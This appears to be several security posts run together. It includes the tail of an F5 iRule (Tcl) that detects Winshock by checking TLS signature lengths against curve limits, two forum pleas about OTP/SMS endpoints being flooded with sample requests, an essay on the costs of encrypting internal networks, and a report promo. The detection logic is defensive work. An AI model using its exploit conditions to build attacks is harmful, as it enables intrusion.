                            "\x06\x05\x2b\x81\x04\x00\x22" { set sPrimeCurve "P-384" }
                            "\x06\x05\x2b\x81\x04\x00\x23" { set sPrimeCurve "P-521" }
                            default {
                                #log local0. "Invalid curve"
                            }
                        }
                    }
                } elseif { $tls_xacttype == 22 && $tls_action == 15 } {
                    #log local0. "Certificate Verify"
                    set iScanStart [expr {$iRecordPointer + 11}]
                    set iScanLength [expr {$tls_recordlen - 6}]
                    binary scan [TCP::payload] @${iScanStart}A${iScanLength} client_signature
                    binary scan $client_signature c cSignatureHeader
                    if { $cSignatureHeader == 48 } {
                        binary scan $client_signature @3c r_len
                        set s_len_offset [expr {$r_len + 5}]
                        binary scan $client_signature @${s_len_offset}c s_len
                        set iMessageLength $r_len
                        if { $iMessageLength < $s_len } {
                            set iMessageLength $s_len
                        }
                    } else {
                        #log local0. "Sig header invalid"
                    }
                } else {
                    #log local0. "Uninteresting TLS action"
                }
                # Curve and length found - check Winshock
                if { $sPrimeCurve ne "" && $iMessageLength > 0 } {
                    set iMaxLength 0
                    switch $sPrimeCurve {
                        "P-256" { set iMaxLength 33 }
                        "P-384" { set iMaxLength 49 }
                        "P-521" { set iMaxLength 66 }
                    }
                    if { $iMessageLength > $iMaxLength } {
                        log local0. "Winshock detected - Invalid message length (found: $iMessageLength, max: $iMaxLength)"
                        set bKill 1
                    }
                }
                # Exploit found, close connection
                if { $bKill } {
                    TCP::close
                    set bNextRecord 0
                } else {
                    # Next record
                    set iRecordPointer [expr {$iRecordPointer + $tls_recordlen + 5}]
                    if { $iRecordPointer == [TCP::payload length] } {
                        # End of records => Assume it is the end of the packet.
                        #log local0. "End of records"
                        set bNextRecord 0
                        set iPacketCounter 0
                        set iRecordPointer 0
                        set sPrimeCurve ""
                        set iMessageLength 0
                        TCP::release
                        TCP::collect
                    } else {
                        if { $bNextRecord < $MAX_TLS_RECORDS } {
                            set bNextRecord [expr {$bNextRecord + 1}]
                        } else {
                            set bNextRecord 0
                            #log local0. "Too many loops over TLS records, exit now"
                            TCP::release
                            TCP::collect
                        }
                    }
                }
            } else {
                #log local0. "Record fragmented"
                set bNextRecord 0
                set iPacketCounter [expr {$iPacketCounter + 1}]
                TCP::collect
            }
        }
    } else {
        # Exit here if packet is not TLS handshake
        if { $iPacketCounter == 0 } {
            TCP::release
            TCP::collect
        }
    }
}
```

Create a new iRule and attach it to your virtual server.
Preventing DDoS attacks on SMS URL

Dear Community,

I am facing DDoS attacks on one of our applications. The attacker is sending hundreds of requests to a URL, which is consuming all of our SMS quota. The attack is originating from multiple IPs. Please inform me how I can protect this application API from this kind of DDoS attack at the application code level. I need help from application security experts and web developers.

https://abc.com is the frontend and xyz.com is the backend API.

Sample DDoS request:

```http
POST /asdf/service/sendmobilecode HTTP/1.1
Host: xyz.com
Authorization: ***********
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Content-Type: application/json
Origin: https://abc.com
Referer: https://abc.com/

{"number":"91234567890"}
```

Kind Regards
Protecting against DDoS attack

Dear Community,

I need help from application security experts and seasoned web developers. We are getting DDoS attacks on the following requests. This attack is targeting our SMS gateway, resulting in the triggering of thousands of SMS messages. Please inform us which kinds of protections we can introduce at the application level / application code level to protect against this DDoS attack.

DDoS request sample:

```http
POST xyz.com/api/otp/asdf HTTP/1.1
Host: xyz.com
Content-Length: 32
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Accept: application/json, text/plain, */*
Authorization: ***********
Accept-Language: ar
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Content-Type: application/json
Origin: http://abc.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://abc.com
Accept-Encoding: gzip, deflate
Connection: close

{"mobileNumber":"123456789"}
```

Warm Regards
Beware Using Internal Encryption as an IT Security Blanket

It certainly sounds reasonable: networks are moving toward a perimeter-less model, so the line between internal and external networks is blurring. The introduction of cloud computing as overdraft protection (cloud-bursting) further blurs that perimeter such that it's more a suggestion than a rule. That makes the idea of encrypting everything, whether it's on the internal or external network, seem to be a reasonable one. Or does it?

THE IMPACT ON OPERATIONS

A recent post posits that PCI Standard or Not, Encrypting Internal Network Traffic is a Good Thing. The arguments are valid, but there is a catch (there's always a catch). Consider this nugget from the article:

"Bottom line is everyone with confidential data to protect should enable encryption on all internal networks with access to that data. In addition, layer 2 security features should be enabled on the access switches carrying said data. Be sure to unencrypt your data streams before sending them to IPS, DLP, and other deep packet inspection devices. This is easy to say but in many cases harder to implement in practice. If you run into any issues feel free to post them here. I realize this is a controversial topic for security geeks (like myself) but given recent PCI breaches that took advantage of the above weaknesses, I have to error on the side of security. Sure more security doesn't always mean better security, but smarter security always equals better security, which I believe is the case here." [emphasis added]

It is the reminder to decrypt data streams before sending them to IPS, DLP, and other "deep packet inspection devices" that brings to light one of the issues with such a decision: the complexity of operations and management. The problem isn't just the additional latency inherent in decrypting secured data streams so that a large number of the devices in an architecture can perform their tasks, though that is certainly a concern. The larger problem is the operational inefficiency that comes from decrypting secured data at multiple points in the architecture.

See, there's this little thing called "keys" that have to be shared with every device in the data center that will decrypt data, and that means managing each of those key stores in its own right. Keys are the, well, key to the kingdom of data encryption, and if they are lost or stolen it can be disastrous to the security of all affected systems and applications. By better securing data in flight through encryption of all data on the internal network, an additional layer of insecurity is introduced that must be managed.

But let's pretend this additional security issue doesn't exist, that all systems on which these keys are stored are secure (ha!). Operations must still (a) configure every inline device to decrypt and re-encrypt the data stream and (b) manage the keys/certificates on every inline device. That's in addition to managing the keys/certificates on every endpoint for which data is destined. There's also the possibility that intermediate devices receiving decrypted data - often implemented using spanned/mirrored ports on a switch/router - will require a re-architecting of the network to implement such an architecture. Not only must each device be configured to decrypt and re-encrypt data streams, it must be configured to do so for every application that utilizes encryption on the internal network.
For an organization with only one or two applications this might not be so onerous a task, but for organizations using multiple applications, domains, and thus keys/certificates, the task of deploying all those keys/certificates, configuring each device, and then managing them through the application lifecycle can certainly be a time-consuming process. This isn't a linear mathematics problem: for every key or certificate added, the cost of managing that information increases by the number of devices that must be in possession of that key/certificate. Ten certificates spread across twenty inline devices, for example, already means two hundred key deployments to track, rotate, and secure.

INTERNAL ENCRYPTION CAN HIDE REAL SECURITY ISSUES

The real problem, as evinced by recent breaches of payment card processing vendors like Heartland Systems, is not whether data was encrypted on the internal network, but that the systems through which that data was flowing were not secured. Attackers gained access through the systems - the ones we are pretending are secure for the sake of argument. Obviously, pretending they are secure is not a wise course of action. One cannot capture and sniff out unsecured data on an internal network without first being on the internal network. This is a very important point, so let me say it again: One cannot capture and sniff out unsecured data on an internal network without first being on the internal network.

It would seem, then, that the larger issue here is the security of the systems and devices through which sensitive data must travel, and that encryption is really just a means of last resort for data traversing the internal network. Internal encryption is often a band-aid that merely covers up the real problem of insecure systems and poorly implemented security policies. Granted, in many industries internal encryption is a requirement and must be utilized, but those industries also accept, and grant IT the understanding, that costs will be higher in order to implement such an architecture. The additional costs are built into the business model already. That's not necessarily true for most organizations, where operational efficiency is now just as high a priority as any other IT initiative.

The implementation of encryption on internal networks can also lead to a false sense of security. It is important to remember that encrypted tainted data is still tainted data; it is merely hidden from security systems, which are passive in nature unless the network is architected (or re-architected) such that the data is decrypted before being channeled through those solutions. Encryption hides data from prying eyes; it does nothing to ensure the legitimacy of the data. Simply initiating a policy of "all data on all networks must be secured via encryption" does not make an organization more secure, and in fact it may lead to a less secure organization as it becomes more difficult and costly to implement security solutions designed to dig deeper into the data and ensure it is legitimate traffic free of taint or malicious intent.

"Bottom line is everyone with confidential data to protect should enable encryption on all internal networks with access to that data."

The "bottom line" is that everyone with confidential data to protect - which is just about every IT organization out there - needs to understand the ramifications of enabling encryption across the internal network, both technically and from a cost/management perspective. Encryption of data on internal networks is not a bad thing to do at all, but it is also not a panacea.
The benefits of implementing internal encryption need to be weighed against the costs and balanced with risk, not simply tossed blithely over the network like a security blanket.

Related posts:

- PCI Standard or Not, Encrypting Internal Network Traffic is a Good Thing
- The Real Meaning of Cloud Security Revealed
- The Unpossible Task of Eliminating Risk
- Damned if you do, damned if you don't
- The IT Security Flowchart
The State of the State of Application Exploits in Security Incidents (SoSo Report)

Cybersecurity is always about perspective, and that is doubly true when talking about the rapidly changing field of application security. With The State of the State of Application Exploits in Security Incidents, F5 Labs and the Cyentia Institute provide a more complete view of the application security elephant. We examine published industry reports from multiple sources for a better understanding of the frequency and role of application exploits. So, let's start the clock to learn more about the affectionately named SoSo Report. Get your copy at F5 Labs.